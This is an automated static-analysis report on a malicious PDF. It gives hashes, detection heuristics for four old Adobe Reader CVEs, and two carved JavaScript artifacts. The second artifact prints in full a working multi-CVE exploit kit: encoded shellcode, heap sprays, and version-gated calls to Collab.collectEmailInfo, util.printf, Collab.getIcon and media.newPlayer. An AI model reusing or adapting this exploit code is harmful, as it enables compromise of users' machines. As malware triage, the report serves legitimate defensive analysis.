Malicious PDF — malware analysis report

Static analysis result for SHA-256 294189f71516e7fc…

MALICIOUS

PDF

44.6 KB First seen: 2012-10-30
MD5: 76e31d7aa3720710d9a1f9e230259b20 SHA-1: 7c3a102eeee925e641effc8845b793355d273346 SHA-256: 294189f71516e7fccce6c98a5f3c34ac68ad1dcf463a10951703ed5940a3eb6b
408 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xAFD2 447 bytes
SHA-256: c8b8d65015f51511875f3e5cbc7b7dd29c1fde22d1c4e9b7a5c3062f1e0dfc8b
Preview script
First 1,000 lines of the extracted script
ermsk='';
qwe = ('nhsthn','ntrht').substr;
var g = qwe();
t='le';
a=["e","a","n","b","w",'v'];
e=g[a[0]+a[5]+a[1]+t[0]];
e('ahfw=t'+('qwtwqt','hisundefined').replace(typeof qwe.dagb,'.')+'tit'+t);
wsewt=e('String.fro'+ahfw.substr(1,9));
xeodx = e(ahfw.substr(10)['rep'+'l'+('nsdnf','ace')](/u/g,','));
e('k=xeodx.length');
for (i = 0; i < k; i+=2) {
	cumf = xeodx[i+1] + ('erybjkerl',xeodx[i]);
	ermsk += wsewt(cumf);
}
e(ermsk);
legacy_pdfkit_stage_000.js deobfuscated-js metadata bmCharCode pair decoded JavaScript at offset 0x37 3654 bytes
SHA-256: 91de71c217db0388e6a231ad6f228325a4aa344d6ca9eec05de3ec1ddfa8bd28
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var bjsg='%u9090%u9090%u16eb%u3cb9%u0001%u8b00%u2434%uf789%u3e80%u74e9%uac06%u1734%ue2aa%uc3fa%ue5e8%uffff%ufeff%u161b%u1717%u9649%u4bfb%u1716%u9e17%u9af0%u0758%u789a%u2643%u40cc%u4446%u4444%u4444%u4444%u4442%u7f44%u1613%u1717%u4142%u7f44%u7978%u1717%u627f%u7b65%u437a%u997f%u1959%ufffb%u175f%u1717%uff47%u176b%u1717%uc7e8%ud394%u7f1f%uf858%u1258%uff47%u177b%u1717%uc7e8%ud792%u0062%u437d%ue44e%u7fbd%ue965%u01a4%u0aff%u1717%u4717%u46ff%u1717%ue817%u44c7%ue97d%u9e7f%u1678%uffaa%u171f%u1717%uff47%u172b%u1717%uc7e8%u2677%u73d7%u479c%u9c27%u1b45%u459c%u9c03%u3f65%u0fae%u1717%u2617%u26e8%ubbd7%u762b%u156b%u373b%ud8d6%u161a%uf5d0%u96e7%u4ce8%u5dab%u9c7d%u0755%u059c%uce62%u539e%u0b33%ud476%u9c77%u337b%u9c33%u2b52%u439c%u6f12%ufd16%u5d9c%u9c0f%u374d%ufc16%u23f4%u9c5e%u9c23%uf916%ue826%ud726%ubbeb%ud793%u1063%ud8d6%u161a%ufcd0%u2ce3%u336b%u623f%u9cf6%u334d%ufc16%u9c71%u5c1b%u4d9c%u160b%u9cfc%u9c13%uff16%u539e%u0b33%ud576%u171f%uf8ff%ue8e9%u7fe8%u6363%u2d67%u3838%u7873%u767a%u797e%u787a%u7863%u7e39%u7179%u3878%u3973%u7f67%u2867%u2a71%u2424%u7231%u222a%u0017';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}
ra=ra.substring(0,qy/2);return ra;} 
function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} 
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;} 
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});} 
function printf(){nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape("%u0A0A%u0A0A");headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} 
fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} 
mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} 
var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);} 
function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape("%u9090%u9090");yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} 
var tUMhNbGw=unescape("%09");while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} 
tUMhNbGw="N."+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} 
aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} 
if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}
var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} 
if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}
d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}
a();a();try{this.media.newPlayer(null);}catch(e){}
a();}}